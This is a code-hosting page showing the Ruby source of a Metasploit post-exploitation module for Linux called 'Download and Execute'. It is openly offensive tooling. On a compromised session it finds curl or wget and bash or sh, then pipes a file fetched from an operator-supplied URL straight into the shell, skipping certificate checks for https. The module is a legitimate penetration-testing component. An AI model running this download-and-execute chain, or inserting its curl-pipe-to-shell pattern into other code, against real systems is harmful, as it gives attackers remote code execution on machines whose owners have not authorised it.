rapid7/metasploit-framework

View on GitHub
modules/post/linux/manage/download_exec.rb

Summary

Maintainability
A
0 mins
Test Coverage
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::System

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Linux Manage Download and Execute',
        'Description' => %q{
          This module downloads and runs a file with bash. It first tries to uses curl as
          its HTTP client and then wget if it's not found. Bash found in the PATH is used
          to execute the file.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Joshua D. Abraham <jabra[at]praetorian.com>',
        ],
        'Platform' => ['linux'],
        'SessionTypes' => ['shell', 'meterpreter']
      )
    )

    register_options(
      [
        OptString.new('URL', [true, 'Full URL of file to download.'])
      ]
    )
  end

  def cmd_exec_vprint(cmd)
    vprint_status("Executing: #{cmd}")
    output = cmd_exec(cmd)
    if !output.empty?
      vprint_status(output.to_s)
    end
    return
  end

  def exists_exe?(exe)
    vprint_status "Searching for #{exe} in the current $PATH..."
    path = get_env('PATH')
    if path.nil? || path.empty?
      return false
      vprint_error 'No local $PATH set!'
    else
      vprint_status "$PATH is #{path.strip!}"
    end

    path.split(':').each do |p|
      full_path = p + '/' + exe
      vprint_status "Searching for '#{full_path}' ..."
      return true if file_exist?(full_path)
    end

    return false
  end

  def search_http_client
    print_status('Checking if curl exists in the path...')
    if exists_exe?('curl')
      print_good('curl available, using it')
      @stdout_option = ''
      @http_client = 'curl'
      @ssl_option = '-k'
      return
    end

    print_status('Checking if wget exists in the path...')
    if exists_exe?('wget')
      print_good('wget available, using it')
      @http_client = 'wget'
      @stdout_option = '-O-'
      @ssl_option = '--no-check-certificate'
      return
    end
  end

  def search_shell
    print_status('Checking if bash exists in the path...')
    if exists_exe?('bash')
      print_good('bash available, using it')
      @shell = 'bash'
      return
    end

    print_status('Checking if sh exists in the path...')
    if exists_exe?('sh')
      print_good('sh available, using it')
      @shell = 'sh'
      return
    end
  end

  def run
    search_http_client

    if !@http_client
      print_warning('neither curl nor wget available in the $PATH, aborting...')
      return
    end

    search_shell

    if !@shell
      print_warning('neither bash nor sh available in the $PATH, aborting...')
      return
    end

    if datastore['URL'].match(%r{^https://})
      cmd_exec_vprint("#{@http_client} #{@stdout_option} #{@ssl_option} #{datastore['URL']} 2>/dev/null | #{@shell}")
    else
      cmd_exec_vprint("#{@http_client} #{@stdout_option} #{datastore['URL']} 2>/dev/null | #{@shell}")
    end
  end
end